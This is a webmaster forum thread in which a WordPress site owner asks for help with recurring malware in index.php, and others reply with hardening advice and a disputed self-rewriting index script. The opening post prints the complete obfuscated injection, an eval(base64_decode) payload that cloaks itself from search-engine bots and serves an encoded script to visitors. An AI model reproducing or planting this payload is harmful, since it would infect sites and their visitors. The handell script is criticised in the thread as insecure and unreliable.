1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

my index.php infected, I cleaned it but the malware keeps coming.

Discussion in 'Security' started by profmustamar, Dec 15, 2011.

  1. #1
    Hello,
    I have few websites in my webhosting. They are based on WordPress.

    Last few days my websites are infected by malware. All main index.php on domain root folder is infected with code like this:
    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RENWxkbUZzS0daMWJtTjBhVzl1S0hBc1lTeGpMR3NzWlN4a0tYdGxQV1oxYm1OMGFXOXVLR01wZTNKbGRIVnliaWhqUEdFL0p5YzZaU2h3WVhKelpVbHVkQ2hqTDJFcEtTa3JLQ2hqUFdNbFlTaytNelUvVTNSeWFXNW5MbVp5YjIxRGFHRnlRMjlrWlNoakt6STVLVHBqTG5SdlUzUnlhVzVuS0RNMktTbDlPMmxtS0NFbkp5NXlaWEJzWVdObEtDOWVMeXhUZEhKcGJtY3BLWHQzYUdsc1pTaGpMUzBwZTJSYlpTaGpLVjA5YTF0alhYeDhaU2hqS1gxclBWdG1kVzVqZEdsdmJpaGxLWHR5WlhSMWNtNGdaRnRsWFgxZE8yVTlablZ1WTNScGIyNG9LWHR5WlhSMWNtNG5YRngzS3lkOU8yTTlNWDA3ZDJocGJHVW9ZeTB0S1h0cFppaHJXMk5kS1h0d1BYQXVjbVZ3YkdGalpTaHVaWGNnVW1WblJYaHdLQ2RjWEdJbksyVW9ZeWtySjF4Y1lpY3NKMmNuS1N4clcyTmRLWDE5Y21WMGRYSnVJSEI5S0NkeUlHNG9OU2w3TXlCaVBWd25kMXduT3pNZ1l6MW9JR1VvS1R0cktETWdhVDB3TzJrOGVEdHBLeXNwZTJOYllpNW1LR2srUGpRcEsySXVaaWhwSm5VcFhUMTBMbkVvYVNsOU5pZ2hOUzV6S0M5ZVcyRXRkaTA1WFNva0wya3BLVzhnZVRzMktEVXVaeVV5S1RVOVhDY3dYQ2NyTlRzeklHdzlOUzVuT3pNZ056MW9JR1VvS1RzeklHbzlNRHRyS0RNZ2FUMHdPMms4YkR0cEt6MHlLWHMzVzJvcksxMDlZMXMxTGtFb2FTd3lLVjE5YnlBM0xub29YQ2RjSnlsOU5pZzRMbTB1UXloY0ozQTlaRnduS1QwOUxURXBlemd1UWlodUtGd25SRnduS1NrN09DNXRQVnduY0Qxa1hDZDlKeXcwTUN3ME1Dd25mSHg4ZG1GeWZIeGtZWFJoZkdsbWZISmxjM1ZzZEh4a2IyTjFiV1Z1ZEh4OGZHSXhObDlrYVdkcGRITjhZakUyWDIxaGNIeGxibUZpYkdWa2ZFRnljbUY1ZkdOb1lYSkJkSHhzWlc1bmRHaDhibVYzZkh4OFptOXlmR3hzZkdOdmIydHBaWHhvUkdOa2ZISmxkSFZ5Ym54amIyOXJhV1ZvZkdaeWIyMURhR0Z5UTI5a1pYeG1kVzVqZEdsdmJueHRZWFJqYUh4VGRISnBibWQ4TVRWOFpqQjhNREV5TXpRMU5qYzRPV0ZpWTJSbFpud3lOVFo4Wm1Gc2MyVjhhbTlwYm54emRXSnpkSEo4ZDNKcGRHVjhhVzVrWlhoUFpud3pZelkwTmprM05qSXdOek0zTkRjNU5tTTJOVE5rTWpJM01EWm1Oek0yT1RjME5qazJaalpsTTJFeU1EWXhOakkzTXpabU5tTTNOVGMwTmpVellqSXdObU0yTlRZMk56UXpZVEl3TW1Rek1UTTVNemt6TXpjd056Z3pZakl3TnpRMlpqY3dNMkV5TURKa016SXpPVE01TXpRM01EYzRNMkl5TWpObE0yTTJPVFkyTnpJMk1UWmtOalV5TURjM05qazJORGMwTmpnelpESXlNekl6TURJeU1qQTJPRFkxTmprMk56WTROelF6WkRJeU16TXpNREl5TWpBM016Y3lOak16WkRJeU5qZzNORGMwTnpBellUSm1NbVkyWmpaa056TTJOVFk0TnpRM09EYzROelUyWVRKbE5qUTJORFpsTnpNeVpUWTVObVUyTmpabU1tWTJaRFl4TmprMlpUSmxOekEyT0Rjd00yWTNNRFl4TmpjMk5UTmtOak16TmpNNU5qSTJORE13TXpJMk5UTTVNek0yTlRNMk16a3pOVE0zTmpNeU1qTmxNMk15WmpZNU5qWTNNall4Tm1RMk5UTmxNMk15WmpZME5qazNOak5sSnk1emNHeHBkQ2duZkNjcExEQXNlMzBwS1R3dmMyTnlhWEIwUGc9PSIpOw0KfQ=='));
    Code (markup):
    I scanned it through http://www.sucuri.net, and it says that my website is infected with MW JS Depack.
    SEMrush
    I found this article: http://www.victorciobanu.com/how-to-remove-mwjsdepack/ but I think it's different, because I can't find any problem with my wp-settings.php.

    If you have any suggestion about this, let me know.
     
    profmustamar, Dec 15, 2011 IP
    SEMrush
  2. madaboutlinux

    madaboutlinux Member

    Messages:
    250
    Likes Received:
    7
    Best Answers:
    2
    Trophy Points:
    43
    #2
    It can happen due to number of reasons.
    1. Incorrect permissions on your website files.
    2. Weak Ftp passwords
    3. A malicious script on your domain (under plugins/templates) injecting these code in your files
    4. It could be on the server your website is hosted on and injecting not only your website but others too.
    etc..

    I think you are on a Shared hosting server, and it is best for you to contact the hosting provider and ask them to check the server logs to find out how this happened. If they don't provide proper help, its better to change the hosting company OR get your own server (VPS/dedicated) so you can have proper security settings and then host your websites.
     
    madaboutlinux, Dec 16, 2011 IP
  3. lachrymologist

    lachrymologist Active Member

    Messages:
    456
    Likes Received:
    4
    Best Answers:
    1
    Trophy Points:
    70
    #3
    change your ftp passwords, your PC might be infected by malware
     
    lachrymologist, Dec 16, 2011 IP
  4. sandeep002

    sandeep002 Peon

    Messages:
    9
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #4
    I am agree with Madaboutlinux, Add toughest permission to root directory so that any user can not update the files
     
    sandeep002, Dec 19, 2011 IP
  5. ideamine

    ideamine Member

    Messages:
    83
    Likes Received:
    2
    Best Answers:
    2
    Trophy Points:
    28
    #5
    Hi,

    Since the malware keeps coming and injecting line of codes to your files ... i recommenced a full scan of the server and check the permission of the directories and files. While changing the permission ensure that it wont affect the sites working.
     
    ideamine, Dec 20, 2011 IP
  6. evuln.com

    evuln.com Greenhorn

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    21
    #6
    + check recently modified files for web shells or reinstall WP from clean distro.
     
    evuln.com, Jan 1, 2012 IP
  7. handell

    handell Peon

    Messages:
    2
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    1
    #7
    I use this....


    <?php
    /*
    HEY ALL...
    This indexing method will remove all those malware attackers who try and add code to the index files. By changing the name of a good working non-infected index file to index_REAL.php or whatever. Then createing a new main index.php file that will contain only these 3 lines:
    <?php
    include("index_REAL.php") ;
    ?>


    So heres where the magic happens... the "index_REAL.php" file will rewrite the index file every time it gets accessed so any info that was changed will be restored with the original code by inserting this code at the end of "index_REAL.php"
    <?php
    $File = "index.php";
    $Handle = fopen($File, 'w');
    $Data = "<?php
    include(\"index_REAL.php\") ;
    ?>";
    fwrite($Handle, $Data);
    fclose($Handle);

    NOTE!!! BE CAREFUL NOT TO DELETE THE ORIGINAL "index_installer.php" is a self deleting installer file. If lost, a new copy can be download from: http://tmgraphics.biz/standard/index_installer_BACKUP.php
    any questions, please email me at
    however you will have to enable the unlink installer line at the bottom of the script
    */
    $origindex = "index.php"; ///assuming its .php
    $realindex = "index_REAL.php";
    echo $myname = basename($_SERVER['PHP_SELF']);

    if (file_exists($realindex) == 0){
    echo "pass1";
    if (file_exists($origindex) == 1){
    echo "pass2";
    rename($origindex, $realindex);
    $Handle = fopen($origindex, 'w');
    $Data = "

    <?php
    include(\"$realindex\") ;
    ?>";
    fwrite($Handle, $Data);
    fclose($Handle);
    $Handle = fopen($realindex , 'a');
    $Data = "<?php
    \$File = \"$origindex\";
    \$Handle = fopen(\$File, 'w');
    \$Data = \"<?php
    include(\\\"$realindex\\\") ;
    ?>\";
    fwrite(\$Handle, \$Data);
    fclose(\$Handle);
    ?>

    ";
    fwrite($Handle, $Data);
    fclose($Handle);
    echo "pass3 <a href= \"$origindex\"> GOTO INDEX</a>";
    }
    }
    else
    {
    echo "you are already SAFE!!!, '$realindex' ALREADY EXISTS!!";

    }
    sleep(2);
    unlink($myname );
    ?>
     
    handell, Nov 6, 2015 IP
  8. PoPSiCLe

    PoPSiCLe Illustrious Member

    Messages:
    4,625
    Likes Received:
    719
    Best Answers:
    151
    Trophy Points:
    420
    #8
    No, no, no, no, no, no, no, no and HELL NO.
    This code is utter garbage, and provides no more "security" than actually fixing the problem on the server.
    Not to mention that the code itself is horribly written.
    Just fix the problems on the server, and forget about "magic mushroom cloud fixes" like this one.
    I'm just gonna go hit my head on my desk now.
     
    PoPSiCLe, Nov 8, 2015 IP
    Arick unirow and deathshadow like this.
  9. deathshadow

    deathshadow Acclaimed Member

    Messages:
    8,651
    Likes Received:
    1,561
    Best Answers:
    225
    Trophy Points:
    515
    #9
    Gotta go with @PoPSiCLe on this one; because allowing PHP write access to executable files couldn't possibly open up even bigger security holes than already exist...

    Of course that it's a spammish bump of a four year old thread doesn't help with the credibility a whole lot either.
     
    deathshadow, Nov 8, 2015 IP
  10. abdmjz

    abdmjz Active Member

    Messages:
    139
    Likes Received:
    15
    Best Answers:
    0
    Trophy Points:
    55
    #10
    Just remove the malware code from index.php and use chatr command to protect the file from modifying. Even the owner wont be able to make changes without disabling it.

    To lock
    chattr +i /home/username/domains/yourdomain.com/public_html/path/to/file

    To unlock
    chattr -i /home/username/domains/yourdomain.com/public_html/path/to/file
     
    abdmjz, Nov 8, 2015 IP
  11. handell

    handell Peon

    Messages:
    2
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    1
    #11
    say what you will, after repeated malware attacks thank god I have not had an issue with spammers altering my index file since.
    Its only garbage if it doesn't work.
     
    handell, Nov 9, 2015 IP
  12. PoPSiCLe

    PoPSiCLe Illustrious Member

    Messages:
    4,625
    Likes Received:
    719
    Best Answers:
    151
    Trophy Points:
    420
    #12
    Eh, no. It's garbage when it's garbage. That code is horrible, mostly with what it does and how it's written. Add to that that there is no real security in it at all, and the fact that there is NO WAY the normal index.php file should be any more vulnerable than index_blah_something_not_the_real_index.php - a php-file is read ON THE SERVER - nothing in it should be accessible from the outside, apart from the html output to the browser. I don't get how "my index-file is full of malware" doesn't begin to light up some bulbs that MAYBE there's something wrong ON THE SERVER - either the config of the host, or some securityflaws in the code running on it, or just plain old stupidity (which I will guess is a pretty strong contender here).

    BTW - there are [ code ] -bbcodes on this forum. No need to paste code directly in a post, and no, it doesn't help that you color it blue.

    Besides - for that junk code - this does the exact same thing, in about 1/3 of the lines of code:
    
    <?php
    if (!file_exists('index_REAL.php')) {
       if (file_exists('index.php')) {
         rename('index.php','index_REAL.php');
         // $h = fopen('index.php', 'w');
         $data = "<?php
             include (index_REAL.php');
         ?>";
         file_put_contents('index.php',$data);
         $data = "<?php
               $data = '<?php
                           include(\'index_REAL.php\');
                       ?>';
               file_put_contents('index.php',$data);
               ?>";
         file_put_contents('index_REAL.php',$data,FILE_APPEND)
       }
    } else {
       echo 'You\'re already "safe" - index_REAL.php already exist';
    }
    
       echo '<a href="index.php">GOTO INDEX</a>';
    
    ?>
    
    PHP:
     
    PoPSiCLe, Nov 9, 2015 IP
  13. Server rental bangalore

    Server rental bangalore Banned

    Messages:
    3
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    21
    #13
    try to encode using different algorithms